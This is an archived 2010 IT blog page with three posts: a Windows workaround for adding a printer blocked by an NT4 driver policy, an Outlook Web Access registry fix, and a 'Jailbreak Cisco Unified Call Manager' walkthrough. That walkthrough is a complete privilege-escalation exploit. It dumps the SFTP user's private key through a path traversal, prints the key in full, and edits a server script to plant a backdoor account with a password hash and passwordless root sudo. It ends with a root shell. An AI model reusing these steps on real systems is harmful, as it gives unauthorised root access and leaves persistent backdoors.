Archive for July, 2010

can’t add printer due to NT4 policy in effect

// July 21st, 2010 // No Comments » // 2003/2008 Server, Windows 7, Windows Vista, Windows XP

For some printer models, the manufacturer does not package the drivers so that they can be installed as Additional Drivers on a print server. This is the case for many of the less expensive bubble jet, inkjet and multi-function (e.g. scanner/fax/printer) models. The manufacturers deem these to be “personal” printers for use only on the computer to which they are physically connected (parallel, USB or serial port). The manufacturer often says that printing over the network is “not supported” for these models.

If you attempt to install the drivers for these models as Additional Drivers (see for example Install Additional Driver on older OS), you will get some kind of an error or a request for the driver that can not be satisfied no matter what you do. You may also get an error message stating that there is a policy in effect that doesn’t allow NT4 drivers to be installed.

Unfortunately, there are some models that can not be used over the network because the print device and printer driver have to be in bi-directional communication throughout the printing process. The manufacturer’s documentation does not always make this requirement apparent, although there may be FAQs or other documents on the manufacturer’s web site that state this.

Except for those models discussed in the previous paragraph, you can bypass this problem by adding the printer as a local printer on the client computer and associating the printer with a network printer port (i.e. re-direct it to the printer share on the print server). No harm will be done by trying this approach if it doesn’t work, so it’s usually worth a try.

Here’s how to install a printer locally and re-direct it to a network printer port. These instructions are written for Windows XP. This technique does work with Windows 7, Vista, 2008, and 2003 but the dialogs are a bit different, so you may have to read between the lines.

  • Logon at the client computer with a user account that has administrative rights and permissions on the client computer.
  • Click Start, Printers and Faxes
  • Right click in an empty space in the right pane and select Add Printer
  • Click Next
  • Select the Local Printer… radio button, remove the check mark from Automatically detect and install my Plug and Play printer; click Next
  • Select the Create a new port: radio button; from the Type of port: drop down list, select Local Port; click Next
  • In the Enter a port name: text box, key exactly the UNC name of the network printer (e.g. \\printservername\printersharename); click OK
  • Selecting the appropriate entries from the Manufacturer and Printers columns or click the Have Disk button as appropriate
  • Follow through the rest of the Add Printer wizard.

Jailbreak Cisco Unified Call Manager

// July 15th, 2010 // No Comments » // Cisco, Hardware

View this post in an external page.

  1. Connect to the administrator CLI using SSH
  2. Run the command file dump sftpdetails ../.ssh/id_dsa. This should give you the private key of the SFTP user:
    admin:file dump sftpdetails ../.ssh/id_dsa
    -----BEGIN DSA PRIVATE KEY-----
    MIIBvQIBAAKBgQDD4rRO0aI3VTsEYIo48zHDipw7AXR+QmEVsSevdtNNMmWbFeHl
    6aQF7VzwoLzfa1eVpXwGCbk7m1/u7wY/mJNsrClNaPWfa0MbNFPdOI0o4IUA+LNO
    +6GNbDbWMPAdiuV0S/fyg7wUc2DcKTZX6mQuWbGaGbLk2bN1RxkVzqi4vQIVAJaq
    saqLZ10dIsbfk04LaOgxgkZBAoGBAKGquSl92E/ZMmQI/SzhPO9p0uyfhZR8uR2M
    a3R60EP1HyTg+DO6M8REzOSm1PTWpvr0XFAQULfxGZQyjcARIYPmmBSrqz7ETS3y
    bmZcJ19a38H1L2EUuOCO8A3q70NK2DMPoYBf6JV+b77shpz7aE+1Xd0rL3Tyqtzj
    JOFsyxkSAoGBAKmWRxB/pwGtu1eFc5Eb5xCRmVB7JP9xDpqW/DIz2LTxoZBSMRcJ
    5UdZ7ewVGIXYOjKvcR/ua3n6UBa0wBmYuHJ5erjpAHoR0JUjfpz9ONiX47OAKDav
    fLD2lIqnxzUz+QmHUVRiwcjd2AZhyzfChS40/9tKbBaqC2QYki7NKyfzAhUAhuPE
    PSfhcQWR3rOKaYUD85henvE=
    -----END DSA PRIVATE KEY-----
    
  3. Create a file on your local machine, containing the private key just obtained. We will use c:\temp\id.ots in this example.
    C:\>copy con c:\temp\id.ots
    -----BEGIN DSA PRIVATE KEY-----
    MIIBvQIBAAKBgQDD4rRO0aI3VTsEYIo48zHDipw7AXR+QmEVsSevdtNNMmWbFeHl
    6aQF7VzwoLzfa1eVpXwGCbk7m1/u7wY/mJNsrClNaPWfa0MbNFPdOI0o4IUA+LNO
    +6GNbDbWMPAdiuV0S/fyg7wUc2DcKTZX6mQuWbGaGbLk2bN1RxkVzqi4vQIVAJaq
    saqLZ10dIsbfk04LaOgxgkZBAoGBAKGquSl92E/ZMmQI/SzhPO9p0uyfhZR8uR2M
    a3R60EP1HyTg+DO6M8REzOSm1PTWpvr0XFAQULfxGZQyjcARIYPmmBSrqz7ETS3y
    bmZcJ19a38H1L2EUuOCO8A3q70NK2DMPoYBf6JV+b77shpz7aE+1Xd0rL3Tyqtzj
    JOFsyxkSAoGBAKmWRxB/pwGtu1eFc5Eb5xCRmVB7JP9xDpqW/DIz2LTxoZBSMRcJ
    5UdZ7ewVGIXYOjKvcR/ua3n6UBa0wBmYuHJ5erjpAHoR0JUjfpz9ONiX47OAKDav
    fLD2lIqnxzUz+QmHUVRiwcjd2AZhyzfChS40/9tKbBaqC2QYki7NKyfzAhUAhuPE
    PSfhcQWR3rOKaYUD85henvE=
    -----END DSA PRIVATE KEY-----
    ^Z
            1 file(s) copied.
    
  4. If you are using PuTTY, you will have to change the key format from OpenSSH to PuTTY using:
    C:\> puttygen c:\TEMP\id.ots
    

    Save the private key (with or without passphrase) to another file, e.g. c:\temp\id.ppk.

  5. Employ your favorite SFTP tool to connect as sftpuser to your CUCM. Here, we are using psftp.exe from the PuTTY team:
    C:\>psftp -2 -i c:\TEMP\id.ppk [email protected]
    Using username "sftpuser".
    Remote working directory is /home/sftpuser
    psftp>
    
  6. Get the file sftp_connect.sh:
    psftp> get sftp_connect.sh
    remote:/home/sftpuser/sftp_connect.sh => local:sftp_connect.sh
    psftp>exit
    
  7. You can open the file locally now in your favorite editor. Add the following lines after the first line. Make sure that your editor understands the difference between Windows and UNIX line endings! You can use UltraEdit for that task.
    chattr -i /etc/passwd
    chattr -i /etc/shadow
    echo 'jail:x:1337:1337::/tmp:/bin/bash' >> /etc/passwd
    echo 'jail:$1$knkuI5HP$sNn3SJJ/95E.9iD.vvnyw.:14714:1:99999:7:::' >> /etc/shadow
    echo 'jail ALL=(root) NOPASSWD: /bin/bash' >> /etc/sudoers
    chattr +i /etc/passwd
    chattr +i /etc/shadow
    
  8. Now we connect using the sftpuser again and replace the file sftp_connect.sh:
    C:\TEMP\>psftp -2 -i c:\TEMP\id.ppk [email protected]
    Using username "sftpuser".
    Remote working directory is /home/sftpuser
    psftp> del sftp_connect.sh
    rm /home/sftpuser/sftp_connect.sh: OK
    psftp> put sftp_connect.sh
    local:sftp_connect.sh => remote:/home/sftpuser/sftp_connect.sh
    psftp> chmod 555 sftp_connect.sh
    /home/sftpuser/sftp_connect.sh: 0644 -> 0555
    psftp>exit
    
  9. Back in the CUCM administrator CLI, we execute the command file get tftp os7920.txt to trigger our enhanced script. Yes, the command line says TFTP, not SFTP, that’s correct. Never mind. It doesn’t actually matter what you answer to the CLI questions, as long as the file (e.g. os7920.txt) exists and you answer y to the first question.
    admin:file get tftp os7920.txt
    Please wait while the system is gathering files info ...done.
    Sub-directories were not traversed.
    Number of files affected: 1
    Total size in Bytes: 22
    Total size in Kbytes: 0.021484375
    Would you like to proceed [y/n]? y
    SFTP server IP: doesNotMatter
    SFTP server port [22]:
    User ID: SoonToBeRoot
    Password: ***
    
    Download directory: InYourFace
    
    Could not connect to host doesNotMatter on port 22. Please verify SFTP settings.
    admin:
    
  10. Finally, you can connect to your CUCM using SSH, the user name jail and the password break and elevate your privileges by using sudo /bin/bash:
    login as: jail
    [email protected]'s password:
    
    -bash-3.00$ sudo /bin/bash
    bash-3.00# id
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    bash-3.00#
    

OWA – ‘gtLV’ is null or not an object

// July 15th, 2010 // No Comments » // Exchange 2007, Internet Explorer, Scripts, Web Applications

I was getting the “gtLV’ is null or not an object” message when I replied to an email using our Microsoft Online Hosted Exchange email account. Ironically enough, the problem would always occur when I replied to a new email from a Microsoft support engineer. The email would go through but I would get the “ ’gtLV’ is null or not an object” error message popup on the screen. If I replied to the email again the problem would not occur. A very similar message can be seen in the Microsoft Exchange Server forums where I also posted the provided solution.

After many emails to the very patient support tech at Microsoft (as I would reply and then send an email to let him know if the reply worked or not) we escalated the ticket and I got back the following resolution.

1. type regedit on command prompt or run
2. go to: HKCU\Software\Microsoft\Internet Explorer\Main
3. create TabProcGrowth (string or dword) and set the value to 0

This solution worked for me.  From what I can see at the ie8blog this has the side effect of reducing the protectedmode protection and I think the browser tabs use the same process rather than running in seperate processes.  This is a slight downside, but I doubt many users will care – they’re more than happy to have OWA working.